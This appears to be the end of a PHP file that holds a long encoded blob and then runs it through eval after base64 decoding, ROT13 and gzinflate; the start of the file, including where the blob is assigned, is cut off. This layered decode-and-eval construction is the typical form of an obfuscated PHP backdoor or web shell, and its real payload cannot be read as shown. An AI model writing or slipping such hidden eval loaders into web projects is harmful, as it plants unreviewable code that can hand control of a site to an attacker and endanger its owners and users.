c9iRqU5AfRc2uoMxYJpjfDxfvA067xWxId9QJBDk+9me0LTWMqH+aKt7ZmLUFmXfTfPE5uQTsOW86m1airVAAtGJg0QvDp5napMEiF3EaaM8duZeyFuIR58McRTFawgRaFHiAIBN+sQjEeOh1m0+1+YtPY+hHiKMZxGM0bVPLJYbSp9LAhU7Adu2PLN1n1BUTg/MJ+V9paW/oSlUgjqZlCfz0+BugGBgjInlOURU6XAkYukQkUXPDBpjICfagWb85rgOv7GnZG5Sd1h/eIa0gfTHlv4zXUTXycYGuDIQggU/2cohRuFzAJIYVSEOUWkCvUBtWD7Q19J//fVKMkzqk0ufuPopJH4z2G3jycAFcegbLGj0BKXEEBIZglUbrO8xBdxPEYkhAAMsZ7HqUd8DwS2MPIOUVSWuINUjl5DqerOVJ4FolJcx475Q2W9ZZWvExVZzTs5HVmGTiAlQsksMdqLM7dSsgXOTP4PIhLnhjtI8xrxSVAG9kj9myFaoKWU8sIAr2exne8qPoI/K8C/QbpQALr0VJDffudThtgBVscP4KDoQ4MJyiRgA+STYZMJKsQ1ck9cJXW2JxG98cqxxG26OLGGeUIZCQBJvnE8HpvxTEDMx7eL0u5/lfIuPguzrX29YZ6zgToDYBYh6WJhwdzsrxvN+WDazwSPm+QmXs4lU7DyjjpeQRsvz5VVxoKfvgBO4NhwcM3kc6ygDBY4rPQUsI9gBHjLOy9A95QfqMvL2S0AW5xXlcW1sZzY1Xrx8bAIHLuVH2O42S2mskWDdWcPKUQRb6S9Dyy2wCxLCk+dUHalr4tmkegpvSuAlC8QA7cvsw+Zm8CwQ6HGMuzRiwOBIMYjmtiYbRzya4GnWDonITrSWtMyq9wPTwlpYwDzBX3UtA8KbbC1cWO4zJP2BS4VeO8m+nsI5NJCnSz9PUCj1cofPHPZx+t33Rjy3zhH+i89ivvj8s5xd6T4gEpe5A6+z7fPOX1z8JLmyBDOf2bPYTk5J6cMA0v/MVItIfHJZts7fmAsYoIcU2bl2h03GbajAZJR4Idpqpx32lJkiQcVIXloII0Y8+hPcGBDryas44ZKrY8ZvOB+3bK92rnNNF9RaAvO94sCp5IqXifkJtZEYyDNUK7yuPgXCODmYT8E9ayMQl8VMd5fUTvpxAwKi7JK+Z0vgVuV/yB/xUdiWwepugwYegtevzNUiKWoiCsvApYL+8nFYGKD2zZAwOrO10UpRnPBbhShNb+3YxB0B6gluzQafgycq+A6lYXwNx8qdd7GBfLFskmG2eDA82Rb3cC/xI48BpQQESlVhkGZKXrjIyrOszGmXKWNRrrzEhSYqUDJ3X8HaBshrOTgugdS1TbK0NABbK3MrpiiiwqE+nWbfaDgpIj70esteJArb9l8XaZloXE3BaysTNxCS/Ccgcwixt6z1Nd1AFitS5mp3tKbA6v5PRAjH0IYnrdKrEi6F0MHfBq4JPDvClYy8rKqd8gb/aJe8MZpeQFHfFvR6ydW9BXr5MFRW1L+dpO8rIGPwKCPxQCEdrIN8hNFNjUREbbKq+EtJFSs1xTr+vEQDSDVxqWoKmfGIPHsDK4J/bN4NOTcq6tKLE8iuZf+fT9OhcAn0p5Pp+dHJt/rF0XKer3RdfejKRfdQTuYMAgJZTaIUOY41Hgxzs0zfkYN9n6YDVsbYDn6V84Ak+gplhCUIqJl3uBQE5zRdxryf/W1pN+EGtU7MhH9rAJMR8j7BaQvYBKB5DwbaBkt6m00FT1qvBbmA9F++PZlenB2d/ABMzfGLkxfwCIHD3KIvarPJdBl9Rqv0qXpNZ9BRzLnxAdhxskfcDhp0edPerpF6SeSyaxJ5LUj0qYSlZWg7McMGWVkDiHgmsWy9E9WPZQ8XdqUulZQoCTp+BHQKIAM+LtoihcXy02qKeG6QRj6ABE4yBVRIx9QkkqLuvpuUmtIrYbhJT72AB1MWWregndQyJFMvX/ImRqlzkW8/+xb4oz6cIiSD6DiLvKya/YoqJji0L5vIgBv0bJJxUhOtNcQsIthXW6sx8tboCKKHlAqGHWReGUq9ZBQHATdmxx0UYbmBYOGl7/T/uJP+Efcvk/o7F31bqCqvGhPIHcvevdpPII3LruH7Ofx8H/GEv7l59kGassSrJp09sqffV6dqZFm46ctWRjdkb8twjpjhZOA5Xlj/Xnnr25U9GnN/8pVdvvirfFhq+vbHdlqB6A5lOOkc8rUtP0gKpePjdOVcTme0ZIpsSf3oih7YWZWOJmLSbfbVl60mfxICUE/wohEBK1j9Ww8LZcuNRbKxLeUs9XA4OYFiBu3Ye28czVnO9oW1nBpyJqHNlpQGvg2OwD4TruERFFAXTQVRg0yEfjv0sDr7QNNVVAgOI1EgApzE6nOvlHBbR3MEjIwlINNqYw7UiOhG11HWbKX4KyN4z6bMkbjzrpq1kEBKesfaEPksQWDYLQ5ubyYxal7+zY9mCr7VmeMLS3jmxoEiXkDvBk2xFQIh02dzd0hxZEGkKPF8ehBiSszSqugCDKv8SQFJLBiw89CoKc+fP0okhU3fmpTLKU9Ufrn6eMJOGClwTG9U1U/OjAAFrMz+caG1IMU2pIiodoMXLr/h+gSnZKvvvsX367e4xRKX2S7Pgx+f3TVugSkxICnc5Vhl0hnqiVVh6sBY12SouQV84ZmQV7QINS+S2L+G4LQwO++VjareK733Cis1sTxeuKqaTYJ/qk1Ra37BOExDl5y6jD/fRlKFFeVX4ruFl27/wO1dgXiH5L6lalYtKFh6WHUVz+die75PqETTtim9t5Bm+9W5o7rGV7cvTeJthCEalR2XlcCynuxzU+P+8//5iv5H3Ya3ckb1NdX3oR/tuakgQ/9QGyqqqse/fVDdbhuAXPLIfYWMsZ5MZchMkRvcNAbHS9OGS1HFh0SlXL5k0tuRNWr+29A76+NbU8mqqzarG+LdyQc0LrIbP7gd/+WHWr29xns7fvRVnMeKqCtP8/9z2P2EqHt4tToH/++OwbWNuRVEPzEG3ycE/x6BNxE4/D0C/x6B/98i8H9c1EdiDZvlAnNJgai9ocATN0AV15Wqlxph2vPNxW4cMmMMWOZdfN/1oD0XsUW76zKwus4jYBVn+3OxunPcZJnZdkZEfy0Yq97hQMZjx5V7jZXlagRf2XrvuYjk6f7cpftml0m5kxdWMAWBvcJarJ0YstbcRGNZJhX+3fQzQfw9mM5M8ausR66tiDpVrkDGP4pbLvmwcYrtzRS7B0asykd+e6UxVqN+nNAVNbPMeGJ+9rG7HdZHvnPTnDiuwJubJvcdyZW1N0rWPbiydza+2MlCugBeqyztbq3NaX0rWDXDzu4pNfNx/3trkrepGkxN/cJaX3zb8C/jJrtC1bYFVHpb11PDdIfPno7++OQpMm544qYtjAw2A38YDYdddQ9WX2x9nvFEoD/940rPvt7CFb1yxMstxIYZq2b9Z75Ms6217b5lXk2ZveXUcYIQyKUFmqYo8qVc8UzHGu1dwReq+H8w1/jcV0ABnYYXaOKdTYgZEklD2zGZgLhdEwuroqz66BESX3bQfNeOP6h6q58/kz52IKjipbE+qK5FfAQ0bNZMyYOO0vTSY7N1s3NcpTyum5WR8ToTBkLsyvxrcyEgPIyDNRg8ck8X1qV4dcX16t2ID5oxM+Pd7ffztCw7CZfvEgkiEo1ANnM7rHCLtCDsKF9FpYfABW23VB4/3RxNM7TsdU2esGdocsfh27N6J29hsRmLDqDehIAUC2DR2AF1VDxWjAprqXgX0gKCX7pOkFoJnH8LluajL3AbFRDg+I6Nn1/hdqc90IX8ii3VV6vE0ln2LLVS8s2KYDk75FM+NYGUlpkXYTZ9DQg5dTbcwzC8uXfJUbWEFqTatJ+/hE3XqlCBF7of6wrffPhpRn0dJWL+eMPsvRR+q1Aijh+ryHSZKctROT/clL5OyL4Jy75AsOPkijNIvgK/ypLsFEEvCR7A8ws1lbOQ0t/+9GG7FmScfcNKPWfkX/YBtDdCuLnCF3ij4jUhDrf25Wyfz3Iy0O1icO44Qev6YsHG9pW+2uvKsv7Ll6DIDcFCCzjrtH6mvvzKjLQa9AAGuC5hgWYzQ/8O";

eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));
?>